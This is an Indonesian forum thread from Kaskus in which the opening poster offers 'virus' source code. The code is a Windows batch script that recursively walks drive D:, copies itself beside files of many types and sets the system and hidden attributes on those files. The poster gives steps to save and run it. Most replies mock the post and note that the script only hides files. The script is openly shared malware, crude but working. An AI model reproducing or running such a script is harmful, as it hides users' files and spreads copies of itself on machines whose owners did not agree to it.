alexa-tracking

Main Content

1024
1024
KASKUS
51
244
https://www.kaskus.co.id/thread/52d246861e0bc3697a8b48a9/belajar-membuat-virus-perusak
Poll: Berhasil gak gan

This poll is closed - 3 Voters

View Poll
Work 33% (1 votes)
No Work 67% (2 votes)
Inspiratif 
Belajar Membuat virus perusak
Cuma pengen berbagi ilmu N yang pengen belajar buat virus ane kasih sourc'y..
nyoooohhhhh.....
soal'y ane bingung mau share ap...
takut ada yang salah gunain nanti ane di kejar interpol sma FBI..wwkwkkwk


@echo off
for /r "D:\" %%a in (*.doc *.xls *.ppt *.wav *.mp3 *.jpg *.jpeg *.avi *.gif *.txt *.mp4 *.html *.bmp *.exe *.docx *.png *.ico *.rar *.3gp *.flv *.avi *.mkv *.srt *.dll) do (
copy %0 "%%~rahasia.bat" && attrib +s +h "%%~fa"
)
@echo off



save dengan kombeet.bat <--- bisa jg nanda.bat atau yg lain ^_^
jangan lupa bawah nya all files


itu merusak file *.doc *.xls *.ppt *.wav *.mp3 *.jpg *.jpeg *.avi *.gif *.txt *.mp4 *.html *.bmp *.exe *.docx *.png *.ico *.rar *.3gp *.flv *.avi *.mkv *.srt *.dll yang ada didalam local disk D
dan membua file rahasia.bat di disk D
alay...mnding lo bikin yg berguna...
Merusak,,? melihat scriptnya, kok kayanya cuma menyembunyikan aja ya..?

attrib +s +h
ini mah bukan merusak tapi sepertinya mengHidenkan

Code:
*.doc *.xls *.ppt *.wav *.mp3 *.jpg *.jpeg *.avi *.gif *.txt *.mp4 *.html *.bmp *.exe *.docx *.png *.ico *.rar *.3gp *.flv *.avi *.mkv *.srt *.dll
emoticon-Ngakak

makasih ya gan, thread ente udah bikin ane ngakak.
dah lama ngga ketawa kayak gini.
wew emoticon-Belo tsnya genius, kyk nama id nya emoticon-Belo
calon dibuli emoticon-Nohope

Ngakak 

jadilah orang dijalan yang benar emoticon-Malu (S)
ane udah copas ke file terus disimpen pake nama kombeet.bat terus ane jalanin kok nggak bisa yak gan?



eh iya ane pake ubuntu emoticon-Hammer
wkwkwk.. kenapa ya ane baca thread ini bisa ngakak sampai terpingkal-pingkal hahaha.. emoticon-Ngakak emoticon-Ngakak
TS lucu banget, coba masuk stand up comedy gan.. hahaha..
bener-bener refreshing nih.. wkwkwk..
bisa di lemahkan gak bisa di matikan !
Tak terlihat melumpuhkan !

VIRUS
emoticon-Ngakak emoticon-Ngakak Kurang kerjaan banget FBI ama INTERPOL ngejar ente
Quote:Cuma pengen berbagi ilmu N yang pengen belajar buat virus ane kasih sourc'y..
nyoooohhhhh.....
soal'y ane bingung mau share ap...
takut ada yang salah gunain nanti ane di kejar interpol sma FBI..wwkwkkwk
ilmu yg sangat bermanfaat (y) emoticon-Ngakak
wah ane coba berhasil gan,
Belajar Membuat virus perusak

hahaha kocak nih si tsnya emoticon-Ngakak
Wah allay habis nih !!
×